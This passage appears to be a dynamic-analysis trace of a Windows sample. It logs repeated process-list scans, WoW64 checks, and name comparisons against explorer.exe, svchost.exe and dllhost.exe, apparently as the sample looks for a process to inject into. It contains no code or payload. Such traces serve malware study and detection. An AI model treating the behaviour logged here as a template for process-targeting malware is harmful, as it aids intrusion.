th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0242.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0242.833] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.833] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.833] CloseHandle (hObject=0xec) returned 1 [0242.833] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0242.833] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0242.833] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0242.833] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0242.833] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0242.833] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.833] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.833] CloseHandle (hObject=0xec) returned 1 [0242.833] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0242.833] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0242.834] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0242.834] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0242.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7fc) returned 0xec [0242.834] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.834] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.834] CloseHandle (hObject=0xec) returned 1 [0242.834] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="explorer.exe") returned -1 [0242.834] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="svchost.exe") returned -1 [0242.834] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="dllhost.exe") returned 1 [0242.834] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0242.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x53c) returned 0xec [0242.835] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.835] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.835] CloseHandle (hObject=0xec) returned 1 [0242.835] lstrcmpiA (lpString1="population openings.exe", lpString2="explorer.exe") returned 1 [0242.835] lstrcmpiA (lpString1="population openings.exe", lpString2="svchost.exe") returned -1 [0242.835] lstrcmpiA (lpString1="population openings.exe", lpString2="dllhost.exe") returned 1 [0242.835] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0242.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x0 [0242.835] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x0 [0242.836] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0242.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa58) returned 0x0 [0242.836] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0242.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa70) returned 0x0 [0242.837] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0242.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb00) returned 0x0 [0242.837] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbdc) returned 0xec [0242.838] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.838] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.838] CloseHandle (hObject=0xec) returned 1 [0242.838] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0242.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x790) returned 0xec [0242.839] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.839] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.839] CloseHandle (hObject=0xec) returned 1 [0242.839] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0242.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6ac) returned 0x0 [0242.839] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x92c) returned 0xec [0242.840] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.840] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.840] CloseHandle (hObject=0xec) returned 1 [0242.840] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0242.840] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0xec [0242.840] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.840] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.840] CloseHandle (hObject=0xec) returned 1 [0242.840] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.841] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0242.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0242.841] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.841] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0242.841] CloseHandle (hObject=0xec) returned 1 [0242.841] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0242.842] CloseHandle (hObject=0xe8) returned 1 [0242.842] Sleep (dwMilliseconds=0x3e8) [0243.852] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0243.854] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0243.854] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0243.854] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0243.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0243.855] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0243.855] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0243.855] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0243.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0243.856] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0243.856] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0243.856] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0243.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0243.857] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0243.857] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0243.857] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0243.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0243.858] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0243.858] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0243.858] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0243.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0243.859] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.859] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0243.859] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0243.860] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.860] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0243.860] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0243.861] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.861] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0243.861] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0243.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0243.862] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.862] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0243.862] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0243.863] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0243.863] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0243.863] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.863] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.863] CloseHandle (hObject=0xec) returned 1 [0243.863] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0243.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0243.864] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0243.864] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0243.864] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.864] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.864] CloseHandle (hObject=0xec) returned 1 [0243.864] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0243.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0243.865] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0243.865] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0243.865] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0243.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0243.866] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.866] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.866] CloseHandle (hObject=0xec) returned 1 [0243.866] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0243.866] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0243.866] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0243.866] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0243.866] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0243.866] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.866] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.866] CloseHandle (hObject=0xec) returned 1 [0243.867] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0243.867] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0243.867] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0243.867] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0243.867] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0243.867] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.867] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.867] CloseHandle (hObject=0xec) returned 1 [0243.867] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0243.867] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0243.867] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0243.867] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0243.868] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0243.868] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.868] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.868] CloseHandle (hObject=0xec) returned 1 [0243.868] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0243.868] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0243.868] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0243.868] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0243.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0243.869] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.869] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.869] CloseHandle (hObject=0xec) returned 1 [0243.869] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0243.869] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0243.869] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0243.869] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0243.869] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0243.869] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.869] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.870] CloseHandle (hObject=0xec) returned 1 [0243.870] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0243.870] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0243.870] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0243.870] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0243.870] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0243.870] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0243.870] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: 